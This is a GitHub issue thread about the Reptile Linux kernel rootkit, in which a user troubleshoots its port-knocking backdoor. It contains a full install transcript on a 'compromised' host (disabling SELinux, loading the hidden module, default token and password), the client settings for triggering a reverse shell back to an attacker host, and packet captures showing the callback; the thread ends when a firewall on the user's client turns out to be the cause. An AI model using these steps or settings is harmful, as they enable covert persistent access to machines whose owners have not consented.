search

f0rb1dd3n / Reptile

LKM Linux rootkit
2.53k stars 571 forks source link

Port Knocking not connecting back #77

Closed PracaGrande closed 4 years ago

PracaGrande commented 4 years ago

Hi, nice work on putting this code together!

I'm trying to use the Port Knocking feature but still couldn't make it work. On the backdoor I used the following settings:

Token: hax0r Backdoor password: s3cr3t SRC port: 50001

After configuring the client I send the magic packet to the compromised system but don't get a connection back. Using tcpdump I can see the magic packet arriving at the compromised system. Tried connecting to an open and closed port on both TCP and UDP but no luck. Does reptile backdoor listens for the magic packet on any port?

Thanks

f0rb1dd3n commented 4 years ago

hey bro,

How are you installing Reptile (what is the whole list of configuration?). What system are you installing it? Is this system in the same network from yours, or is it behind from a firewall?

I need more information to help you use it, or to discover if this is a Bug.

So, I got a bug list of Reptile, and I am intended to publish some updates soon.

thx,

403

PracaGrande commented 4 years ago

Hi,

On the compromised machine, running Linux 2.6.32-754.22.1.el6.x86_64, I did:

# git clone https://github.com/f0rb1dd3n/Reptile.git
Initialized empty Git repository in /tmp/Reptile/.git/
remote: Enumerating objects: 793, done.
remote: Total 793 (delta 0), reused 0 (delta 0), pack-reused 793
Receiving objects: 100% (793/793), 243.44 KiB | 398 KiB/s, done.
Resolving deltas: 100% (434/434), done.
# cd Reptile/
# ./setup.sh install

############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n

SELinux config found on system!
Checking SELinux status... enforcing
Trying to set enforce permissive... DONE!
Trying to disable SELinux... DONE!
Maybe you will need to reboot!

Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to magic packets (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port of magic packets (default: 666): 50001
Would you like to config reverse shell each X time? (y/n) (default: n): n

Token: hax0r
Backdoor password: s3cr3t
SRC port: 50001

TAGs to hide file contents:

#<reptile>
content to be hidden
#</reptile>

Configuring... DONE!
Compiling... DONE!
Copying files to /reptile... DONE!
Installing... DONE!

Would you like to remove this directory (/tmp/Reptile/) on exit? (Y/N) [default: N]: n
Not removing /tmp/Reptile/

Instalation has finished!

After reboot, reptile_cmd seems to be working well.

$ /reptile/reptile_cmd show
Success!
$ ls -lisa /reptile/
total 652
1569794   4 drwxr-xr-x.  2 root root   4096 Sep 20 17:35 .
      2   4 dr-xr-xr-x. 26 root root   4096 Sep 20 17:39 ..
1569797   8 -rwxrwxrwx.  1 root root   7048 Sep 20 17:35 reptile_cmd
1569795 572 -rwxrwxrwx.  1 root root 585543 Sep 20 17:35 reptile.ko
1569799   4 -rwxrwxrwx.  1 root root   2488 Sep 20 17:35 reptile_rc
1569796  56 -rwxrwxrwx.  1 root root  56224 Sep 20 17:35 reptile_reverse
1569798   4 -rwxrwxrwx.  1 root root    156 Sep 20 17:35 reptile_start

$ ls -lisa /sys/module/ | grep reptile
12653 0 drwxr-xr-x  5 root root 0 Sep 20 17:50 reptile

$ lsmod | grep reptile
reptile                13536  0

On the client side. Same network segment. Linux 3.10.0-1062.el7.x86_64

$ ./setup.sh client

############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n

Configuring... DONE!
Compiling... DONE!

Your client is at bin/

An then:

reptile-client> show

VAR             VALUE                   DESCRIPTION

LHOST           192.168.118.157         Local host to receive the shell
LPORT           80                      Local port to receive the shell
SRCHOST         192.168.118.157         Source host on magic packets (spoof)
SRCPORT         50001                   Source port on magic packets (only for TCP/UDP)
RHOST           192.168.118.156         Remote host
RPORT           80                      Remote port (only for TCP/UDP)
PROT            TCP                     Protocol to send magic packet (ICMP/TCP/UDP)
PASS            s3cr3t                  Backdoor password (optional)
TOKEN           hax0r                   Token to trigger the shell

reptile-client> run
[*] Using password: s3cr3t
[*] Listening on port 80...
[*] TCP: 64 bytes was sent!

On the compromised system, running tcpdump I can see that the client sends TCP packet with the correct source port. It seems it correctly triggers the compromised system to send a packet back to port 80 but is being refused. 

17:55:25.600050 IP 192.168.118.157.50001 > 192.168.118.156.80: Flags [S], seq 1886257152:1886257176, win 8192, length 24
17:55:25.708139 IP 192.168.118.156.40622 > 192.168.118.157.80: Flags [S], seq 3216287733, win 14600, options [mss 1460,sackOK,TS val 688118 ecr 0,nop,wscale 7], length 0
17:55:25.708536 IP 192.168.118.157 > 192.168.118.156: ICMP host 192.168.118.157 unreachable - admin prohibited, length 68

Is there any additional listener or settings that I need to do on the client side?

Thank you

PracaGrande commented 4 years ago

Nevermind, on the client system I was running iptables. Its working correctly.